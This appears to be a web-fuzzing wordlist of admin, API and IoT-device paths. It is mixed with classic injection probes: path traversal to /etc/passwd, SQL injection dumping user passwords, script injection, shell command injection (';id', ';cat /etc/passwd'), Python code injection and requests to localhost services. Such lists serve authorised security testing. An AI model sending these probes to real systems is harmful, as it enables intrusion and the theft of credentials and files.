admin
login
wp-admin
phpmyadmin
config
backup
.env
.git/HEAD
.git/config
robots.txt
api
api/v1
api/login
api/config
api/files
api/status
streams
admin/firmware
admin?file=index.html
admin?file=../../etc/passwd
product?id=1
product?id=1'
product?id=1 UNION SELECT user,pass,1 FROM users
search?q=test
search?q=<script>alert(1)</script>
api/ping?host=127.0.0.1
api/ping?host=127.0.0.1;id
api/diag?host=127.0.0.1
api/diag?host=127.0.0.1;cat /etc/passwd
api/wps?pin=00000000
api/wps?pin=;id
api/share
api/snapshot?name=snap1
api/snapshot?name=snap1;id
cook?program=popcorn
cook?program=__import__('os').popen('id').read()
cast?url=http://127.0.0.1/
cast?url=http://127.0.0.1:9200/
app/install?pkg=demo
app/install?pkg=demo;id
color?hex=%23ff0000
state
on
off
